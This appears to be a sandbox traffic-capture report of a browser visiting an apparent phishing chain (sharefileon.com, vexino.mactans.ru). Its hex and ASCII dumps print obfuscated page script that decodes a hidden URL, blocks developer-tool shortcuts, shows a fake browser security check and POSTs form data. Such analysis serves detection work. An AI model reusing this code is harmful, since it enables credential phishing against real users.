                                                                                                                                                                                                                          2024-12-17 17:20:57 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 6c 4f 59 6d 30 79 65 48 56 33 4c 30 6c 34 55 46 41 31 51 32 64 57 55 55 78 6e 55 31 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 62 6b 70 59 53 6d 56 49 51 6d 59 32 53 56 56 68 63 58 70 75 4d 55 35 51 65 6d 5a 45 4f 47 70 32 59 55 56 5a 57 48 6c 42 4d 30 64 61 5a 30 74 76 52 55 68 34 63 44 52 6c 51 69 74 73 4d 6a 68 45 59 57 59 77 61 57 31 55 53 6e 63 31 63 55 5a 57 54 44 52 77 55 33 59 77 63 33 56 6f 61 45 4a 76 53 6c 5a 74 54 47 70 6c 61 31 56 70 57 6d 31 78 5a 47 70 5a 56 30 74 6f 62 58 42 36 57 45 49 30 51 6c 68 7a 59 33 4a 4d 4f 45 68 6f 5a 30 45 30 4d 55 4a 69 5a 48 46 57 52 6c 46 71 63 53 38 35 55 6e 68 6f 64 58 46 31 55 44 63
                                                                                                                                                                                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjlOYm0yeHV3L0l4UFA1Q2dWUUxnU1E9PSIsInZhbHVlIjoibkpYSmVIQmY2SVVhcXpuMU5QemZEOGp2YUVZWHlBM0daZ0tvRUh4cDRlQitsMjhEYWYwaW1USnc1cUZWTDRwU3Ywc3VoaEJvSlZtTGpla1VpWm1xZGpZV0tobXB6WEI0QlhzY3JMOEhoZ0E0MUJiZHFWRlFqcS85UnhodXF1UDc
                                                                                                                                                                                                                          2024-12-17 17:20:57 UTC1369INData Raw: 34 64 34 36 0d 0a 3c 21 2d 2d 20 54 68 65 20 77 61 79 20 74 6f 20 67 65 74 20 73 74 61 72 74 65 64 20 69 73 20 74 6f 20 71 75 69 74 20 74 61 6c 6b 69 6e 67 20 61 6e 64 20 62 65 67 69 6e 20 64 6f 69 6e 67 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 32 5a 58 68 70 62 6d 38 75 62 57 46 6a 64 47 46 75 63 79 35 79 64 53 38 79 4d 55 56 36 64 55 39 4b 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44
                                                                                                                                                                                                                          Data Ascii: 4d46... The way to get started is to quit talking and begin doing. --><script>if(atob("aHR0cHM6Ly92ZXhpbm8ubWFjdGFucy5ydS8yMUV6dU9KLw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+D
                                                                                                                                                                                                                          2024-12-17 17:20:57 UTC1369INData Raw: 73 54 6e 68 43 5a 6e 64 75 5a 48 41 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 7a 68 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 49 47 46 31 64 47
                                                                                                                                                                                                                          Data Ascii: sTnhCZnduZHAuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMzhweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG
                                                                                                                                                                                                                          2024-12-17 17:20:57 UTC1369INData Raw: 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4d 79 6b 67 66 48 77 4e 43 69 41
                                                                                                                                                                                                                          Data Ascii: IGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiA
                                                                                                                                                                                                                          2024-12-17 17:20:57 UTC1369INData Raw: 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 45 52 68 64 6e 6c 58 55 33 52 72 63 6c 6b 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 45 52 68 64 6e 6c 58 55 33 52 72 63 6c 6b 67 4c 53 42 4d 53 30 64 6b 51 6e 52 4f 63 47 31 45 49 44 34 67 54 55 46 77 55 57 70 56 54 31 5a 5a 54 43 41 6d 4a 69 41 68 59 56 52 4f 52 56 42 4f 51 30 31 42 5a 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 56 48 42 32 61 46 4a 4d 63 33 64 61 63 53 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 68 56 45 35 46 55 45 35 44 54 55 46 6c 49 44 30 67 64 48 4a 31 5a 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67
                                                                                                                                                                                                                          Data Ascii: QogICAgICAgIGNvbnN0IERhdnlXU3RrclkgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKERhdnlXU3RrclkgLSBMS0dkQnROcG1EID4gTUFwUWpVT1ZZTCAmJiAhYVRORVBOQ01BZSkgew0KICAgICAgICAgICAgVHB2aFJMc3dacSA9IHRydWU7DQogICAgICAgICAgICBhVE5FUE5DTUFlID0gdHJ1ZTsNCiAgICAgICAgICAg
                                                                                                                                                                                                                          2024-12-17 17:20:57 UTC1369INData Raw: 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 5a 6b 4a 4b 52 6c 42 6a 51 6d 31 59 54 43 49 2b 44 51 70 44 62 32 35 6b 64 57 4e 30 61 57 35 6e 49 48 4e 6c 59 33 56 79 61 58 52 35 49 47 4e 6f 5a 57 4e 72 63 79 42 76 62 69 42 35 62 33 56 79 49 47 4a 79 62 33 64 7a 5a 58 49 67 5a 6d 39 79 49 48 42 79 62 33 52 6c 59 33 52 70 62 32 34 75 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50
                                                                                                                                                                                                                          Data Ascii: hpZGRlbiIgaWQ9ImJsdGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIiBpZD0iZkJKRlBjQm1YTCI+DQpDb25kdWN0aW5nIHNlY3VyaXR5IGNoZWNrcyBvbiB5b3VyIGJyb3dzZXIgZm9yIHByb3RlY3Rpb24uDQo8L2Rpdj4NCjwvZm9ybT4NCjwvZGl2P
                                                                                                                                                                                                                          2024-12-17 17:20:57 UTC1369INData Raw: 6b 4f 69 41 69 55 45 39 54 56 43 49 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4a 76 5a 48 6b 36 49 47 35 6c 64 79 42 47 62 33 4a 74 52 47 46 30 59 53 68 4e 54 6b 46 75 63 55 4e 36 64 57 39 4d 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 5a 47 46 30 59 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 52 68 64 47 46 62 4a 33 4e 30 59 58 52 31 63 79 64 64 49 44 30 39 49 43 64 7a 64 57 4e 6a 5a 58 4e 7a 4a 79 6c 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 46 52 77 64 6d
                                                                                                                                                                                                                          Data Ascii: kOiAiUE9TVCIsDQogICAgICAgIGJvZHk6IG5ldyBGb3JtRGF0YShNTkFucUN6dW9MKQ0KICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0KICAgICAgICByZXR1cm4gcmVzcG9uc2UuanNvbigpOw0KICAgIH0pLnRoZW4oZGF0YSA9PiB7DQogICAgICAgIGlmKGRhdGFbJ3N0YXR1cyddID09ICdzdWNjZXNzJyl7DQogICAgICAgIGlmKFRwdm
                                                                                                                                                                                                                          2024-12-17 17:20:57 UTC1369INData Raw: 73 74 20 63 68 70 68 67 79 66 4a 45 5a 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 44 70 74 58 75 79 45 4b 71 6d 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 44 70 74 58 75 79 45 4b 71 6d 2e 70 61 74 68 6e 61 6d 65 20 3d 20 44 70 74 58 75 79 45 4b 71 6d 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 6b 67 49 7a 51 59 43 41 43 56 20 3d 20 44 70 74 58 75 79 45 4b 71 6d 2e 70 61 74 68 6e 61 6d 65 2b 27 2f 27 3b 0d 0a 69 66 28 6b 67 49 7a 51 59 43 41 43 56 20 3d 3d 20 63 68 70 68 67 79 66 4a 45 5a 29 7b 0d 0a 64 6f
                                                                                                                                                                                                                          Data Ascii: st chphgyfJEZ = window.location.pathname.split('%23')[0].split('%3F')[0];if (DptXuyEKqm.pathname.endsWith('/')) {DptXuyEKqm.pathname = DptXuyEKqm.pathname.slice(0, -1);}const kgIzQYCACV = DptXuyEKqm.pathname+'/';if(kgIzQYCACV == chphgyfJEZ){do
                                                                                                                                                                                                                          2024-12-17 17:20:57 UTC1369INData Raw: 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 65 6d 78 4f 65 45 4a 6d 64 32 35 6b 63 43 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 70 73 54 6e 68 43 5a 6e 64 75 5a 48 41 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 7a 68 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73
                                                                                                                                                                                                                          Data Ascii: XplOjEuNXJlbTt9DQp9DQojemxOeEJmd25kcCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3psTnhCZnduZHAuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMzhweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1s
                                                                                                                                                                                                                          2024-12-17 17:20:57 UTC1369INData Raw: 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49
                                                                                                                                                                                                                          Data Ascii: lkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgI


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          5192.168.2.184977913.248.243.5443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:20:57 UTC519OUTGET / HTTP/1.1
                                                                                                                                                                                                                          Host: sharefileon.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                          Referer: https://sharefileon.com/sw.js
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          Cookie: dps_site_id=us-east-1; cookie_warning_dismissed=true; cookie_terms_accepted=true
                                                                                                                                                                                                                          2024-12-17 17:20:58 UTC1092INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Link: <//img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.4.47.0.js>; rel=preload; as=script; crossorigin,<https://img1.wsimg.com/gfonts/s/muli/v29/7Aulp_0qiz-aVz7u3PJLcUMYOFnOkEk30eg.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/quicksand/v31/6xKtdSZaM9iE8KbpRA_hK1QN.woff2>; rel=preload; as=font; crossorigin,<https://fonts.googleapis.com>; rel=preconnect; crossorigin,<https://fonts.gstatic.com>; rel=preconnect; crossorigin,<https://img1.wsimg.com>; rel=preconnect; crossorigin,<https://isteam.wsimg.com>; rel=preconnect; crossorigin
                                                                                                                                                                                                                          Cache-Control: max-age=30
                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.com
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                          Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Server: DPS/2.0.0+sha-8f288ca
                                                                                                                                                                                                                          X-Version: 8f288ca
                                                                                                                                                                                                                          X-SiteId: us-east-1
                                                                                                                                                                                                                          Set-Cookie: dps_site_id=us-east-1; path=/; secure
                                                                                                                                                                                                                          ETag: 5427b019f284145fb8fb4e0a244dc63b
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:20:57 GMT
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2024-12-17 17:20:58 UTC15292INData Raw: 63 31 33 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 69 73 74 65 61 6d 2f 69 70 2f 66 39 38 37 65 65 32 38 2d 30 64 32 64 2d 34 64 34 39 2d 62 62 31 31 2d 38 33 34 63 31 39 39 35 66 38 62 33 2f 66 61 76 69 63 6f 6e 2f 39 30 39 63 31 62 34 64 2d 63 39 37 62 2d 34 39 31 34 2d 62 37 65 30 2d 66 33 39 62 61 38 30 32 63 30 35 34 2f 62 37 37 33 62 31 64 62 2d 65 39 36 34 2d 34 64 64 36 2d 38 66 65 64 2d 34 35 66 62 66 64 37 33 66 66 63 35 2e 70 6e 67 2f 3a 2f 72 73 3d 77 3a 31 36 2c 68 3a 31 36 2c 6d 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 2f 3e 3c 6c 69
                                                                                                                                                                                                                          Data Ascii: c134<!DOCTYPE html><html lang="en-US"><head><link rel="icon" href="//img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773b1db-e964-4dd6-8fed-45fbfd73ffc5.png/:/rs=w:16,h:16,m" sizes="16x16"/><li
                                                                                                                                                                                                                          2024-12-17 17:20:58 UTC16384INData Raw: 64 74 68 3a 69 6e 68 65 72 69 74 7d 2e 78 20 2e 63 31 2d 34 73 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 78 20 2e 63 31 2d 34 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 78 20 2e 63 31 2d 34 75 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 37 7d 2e 78 20 2e 63 31 2d 34 76 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 70 78 7d 2e 78 20 2e 63 31 2d 34 77 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 78 20 2e 63 31 2d 34 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 7d 2e 78 20 2e 63 31 2d 34 79 7b 63 6f 6c 6f 72 3a 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 7d 2e 78 20 2e 63 31 2d 34 7a 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 78 20 2e 63 31 2d 35 34 7b 77 6f 72 64 2d 77 72 61 70 3a 6e
                                                                                                                                                                                                                          Data Ascii: dth:inherit}.x .c1-4s{display:block}.x .c1-4t{line-height:1.2}.x .c1-4u{line-height:1.27}.x .c1-4v{margin-bottom:8px}.x .c1-4w{white-space:pre-line}.x .c1-4x{font-size:32px}.x .c1-4y{color:rgb(255, 255, 255)}.x .c1-4z{font-weight:400}.x .c1-54{word-wrap:n
                                                                                                                                                                                                                          2024-12-17 17:20:58 UTC16384INData Raw: 63 6c 61 73 73 3d 22 78 2d 65 6c 20 78 2d 65 6c 2d 64 69 76 20 63 31 2d 31 20 63 31 2d 32 20 63 31 2d 32 67 20 63 31 2d 32 68 20 63 31 2d 62 20 63 31 2d 63 20 63 31 2d 64 20 63 31 2d 65 20 63 31 2d 66 20 63 31 2d 67 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 64 61 74 61 2d 75 78 3d 22 42 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 78 2d 65 6c 20 78 2d 65 6c 2d 64 69 76 20 63 31 2d 31 20 63 31 2d 32 20 63 31 2d 32 69 20 63 31 2d 32 65 20 63 31 2d 32 68 20 63 31 2d 74 20 63 31 2d 32 66 20 63 31 2d 62 20 63 31 2d 63 20 63 31 2d 64 20 63 31 2d 65 20 63 31 2d 66 20 63 31 2d 67 22 3e 3c 64 69 76 20 64 61 74 61 2d 75 78 3d 22 42 6c 6f 63 6b 22 20 64 61 74 61 2d 61 69 64 3d 22 48 45 41 44 45 52 5f 4c 4f 47 4f 5f 52 45 4e 44 45 52 45 44 22 20 63 6c 61 73 73 3d 22 78 2d 65
                                                                                                                                                                                                                          Data Ascii: class="x-el x-el-div c1-1 c1-2 c1-2g c1-2h c1-b c1-c c1-d c1-e c1-f c1-g"></div><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-2i c1-2e c1-2h c1-t c1-2f c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Block" data-aid="HEADER_LOGO_RENDERED" class="x-e
                                                                                                                                                                                                                          2024-12-17 17:20:58 UTC1413INData Raw: 2c 22 77 61 6d 5f 73 69 74 65 5f 62 75 73 69 6e 65 73 73 43 61 74 65 67 6f 72 79 22 3a 22 69 74 73 65 72 76 69 63 65 73 22 2c 22 77 61 6d 5f 73 69 74 65 5f 74 68 65 6d 65 22 3a 22 6c 61 79 6f 75 74 31 34 22 2c 22 77 61 6d 5f 73 69 74 65 5f 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 2c 22 77 61 6d 5f 73 69 74 65 5f 66 6f 6e 74 50 61 63 6b 22 3a 22 6d 75 6c 69 22 2c 22 77 61 6d 5f 73 69 74 65 5f 63 6f 6f 6b 69 65 42 61 6e 6e 65 72 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 77 61 6d 5f 73 69 74 65 5f 6d 65 6d 62 65 72 73 68 69 70 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 77 61 6d 5f 73 69 74 65 5f 68 61 73 48 6f 6d 65 70 61 67 65 48 54 4d 4c 22 3a 66 61 6c 73 65 2c 22 77 61 6d 5f 73 69 74 65 5f 68 61 73 48 6f 6d 65 70 61 67 65 53 68 6f 70 22 3a 66 61
                                                                                                                                                                                                                          Data Ascii: ,"wam_site_businessCategory":"itservices","wam_site_theme":"layout14","wam_site_locale":"en-US","wam_site_fontPack":"muli","wam_site_cookieBannerEnabled":true,"wam_site_membershipEnabled":true,"wam_site_hasHomepageHTML":false,"wam_site_hasHomepageShop":fa


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          6192.168.2.1849784151.101.130.137443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:20:59 UTC623OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                          Host: code.jquery.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                          Referer: https://vexino.mactans.ru/
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:20:59 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Content-Length: 89501
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                          ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:20:59 GMT
                                                                                                                                                                                                                          Age: 2977591
                                                                                                                                                                                                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740048-EWR
                                                                                                                                                                                                                          X-Cache: HIT, HIT
                                                                                                                                                                                                                          X-Cache-Hits: 2774, 322
                                                                                                                                                                                                                          X-Timer: S1734456060.816691,VS0,VE0
                                                                                                                                                                                                                          Vary: Accept-Encoding
